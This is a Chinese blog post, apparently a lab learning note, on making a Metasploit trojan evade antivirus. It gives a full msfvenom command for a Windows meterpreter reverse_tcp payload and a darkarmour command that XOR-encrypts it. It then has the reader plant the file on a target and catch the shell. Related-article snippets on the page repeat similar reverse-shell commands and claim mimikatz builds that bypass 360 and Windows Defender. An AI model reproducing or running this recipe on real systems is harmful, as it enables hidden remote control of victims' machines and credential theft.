网安学习----利用darkarmour实现MSF的免杀

最新推荐文章于 2024-05-29 22:21:42 发布
最新推荐文章于 2024-05-29 22:21:42 发布
阅读量763 收藏 2
点赞数 1
文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58515212/article/details/125134225
版权

使用虚拟机:kali,win7

木马免杀(利用darkarmour实现MSF的免杀)

先看攻击机和目标机是不是一个网段,不在一个网段,就更改kali主机的IP地址

我这里是同一个网段的IP地址

1.安装环境

需要C语言编译器

安装环境

apt-get install mingw-w64-tools mingw-w64-commmon g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode

先输入apt-get install mingw-w64-tools(如果权限不是root,需要在前面加sudo)

在这里我遇到了一个问题,有没有满足的依赖关系

遇到这种情况,直接下载就可以,可以两个一起下载,这个分开下载会出错

 

下载完成之后就可以再尝试apt-get install mingw-w64-tools,成功了,然后直接输入我们要下载的全部就可以了,记得要把mingw-w64-tools也加上,如果不加上会无法定位

2.生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.128 LPORT=4444 -f exe -o run.exe

Msfvenom:有大量的攻击载荷,而msfvenom就是用于快速创建我们需要的攻击载荷并生成指定平台运行的程序,实际上msfvenom就是攻击载荷(payloads)和编码器(encoders)的组合工具,他是独立于msf控制台(msfconsole)之外的,无法在控制台内直接调用.

-p:指定需要使用的payload(攻击载荷)

-o:保存文件

LHOST和LPORT是攻击机的ip地址和端口

3.Msf加载免杀

先将工具放到目录下,然后用unzip进行解压,把解压出来的文件放到生成的木马同一级目录下,然后运行命令

./darkarmour.py -f run.exe --encrypt xor --jump -o cxy.exe -loop 5

 

--encrypty xor:异或加密算法,利用xor进行加密

--jmp:使用基于jmp的PE加载器

--loop 5:加密等级

4.进入msf打开监听

将木马文件放入目标机中

5.点击运行文件 

然后打开kali,看到进去了meterpreter模块中就可以了,尝试一些指令,没有问题就是成功了。

拓展:

Mimikatz的免杀

k:用于加密的密钥key,不设置就会默认随机生成

u:用upx打包可执行文件

小火萤
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
我的免杀之路:利用darkarmour实现mimikatz和MSF免杀
ML_Team的博客
09-24 1335
0x1 mimikatz免杀 这里加密字节的过程比较久,尝试运行bypass_mimikatz.exe 运行成功,看看免杀效果如何 Bypass 360 success! Bypass Windows Defender success! V站评分10/66 0x2 MSF免杀 先生成可执行文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 ..
darkarmour免杀mimikatz
sash1mi
07-02 573
darkarmour免杀mimikatz darkarmour项目地址: https://github.com/bats3c/darkarmour darkarmour是一个可用来免杀exe的项目,使用darkarmour来免杀mimikatz Usage: ./darkarmour.py -f mimikatz.exe -j -l 5 -e xor -o darkmeter.exe -f:文件加密,如果没有另行说明,则假定为二进制文件 -j:使用基于jmp的pe加载器 -e:加密算法(异或) -l:加
kali制作木马并使用shellter免杀工具来实现更低的查杀率
最新发布
勤能补拙
05-29 1036
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀
msf免杀
weixin_30662849的博客
04-13 285
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
免杀方法(三)msf加载器免杀
qq_56426046的博客
10-03 1041
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
免杀方法(九)msf加密壳免杀
qq_56426046的博客
10-04 529
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
php-msf源码详解
10-18
Metasploit是一款非常流行的渗透测试框架,而php-msf则可能是该框架在PHP环境中的实现。此框架的主要用途是帮助安全专家、渗透测试员等从事网络和系统安全研究的人员发现、利用计算机系统和网络中的安全漏洞。源码...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
本手册从介绍异步、并行、协程等基础概念出发,再到框架如何使用,其中也介绍了部分内部实现的原理,简单易上手。通过学习本手册,再结合我们的demo示例项目,就能够使用构建大规模高性能的微服务化分布式系统。 __...
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏...攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
免杀手法 免杀笔记 免杀技巧
07-15
免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧
darkarmour:Windows AV规避
04-13
Windows AV规避工具 从内部存储器存储并执行加密的Windows二进制文件,而无需触摸磁盘。 用法 _,. ,` -.) ( _/-\-._ /,|`--._,-^| ,¡ \_| |`-._/|| / / | `-, / | / / | || | / / ______ _ ___ `r-._||/ __ / / | _ \ | | / _ \ __,-<_ )`-/ `./ / | | | |__ _ _ __| | _/ /_\ \_ __ _ __ ___ ___ _
强大的免杀工具,绝对震撼你!!!!
09-09
exe转jpg的工具,而且右键看属性也是jpg格式的,可别做坏事啊!!
免杀学习(MSF Evasion)
红队是青春
02-05 468
免杀学习MSF Evasion模块
免杀的N种姿势-msf免杀
m0_51268003的博客
04-02 917
原文地址:远控免杀专题文章(3)-msf免杀(VT免杀率35/69) 本人只为技术交流和自我记录笔记 对于原文作者和团队充满膜拜 如有侵权请联系本人删除文章 前言: 本地的安全工具下载安装会影响玩LOL 所以实验嘛 用在线查毒就好啦(virustotal.com) 未处理的payload(VT查杀率53/69) msf自编码处理(VT查杀率51/69) 使用msfvenom --list encoders可查看所有编码器 评级最高的两个encoder为cmd/powe...
msf 免杀学习笔记-1】
qq_44637753的博客
12-29 1670
venom: payload+encoder msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.174.66 lport=4444 -b “\x00\x0ff” -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /var/www/html/hack.exe 参数: -p :指定需要使用的payload; LHOST:攻击机ip地址; LPORT:攻击
MSF 生成静态免杀shell(win)
嘻嘻哈哈
01-26 2642
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
推荐开源项目:DarkArmour - 你的网络安全守护者
gitblog_00049的博客
04-13 343
推荐开源项目:DarkArmour - 你的网络安全守护者 darkarmour项目地址:https://gitcode.com/gh_mirrors/da/darkarmour 项目简介 是一个强大的网络安全工具,旨在提供一种简单而有效的方式来增强你的网络连接的安全性。它是一个基于Python编写的代理服务器,利用了多种加密技术和混淆技术,以保护用户的在线隐私和数据安全。 技术分析 DarkA...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值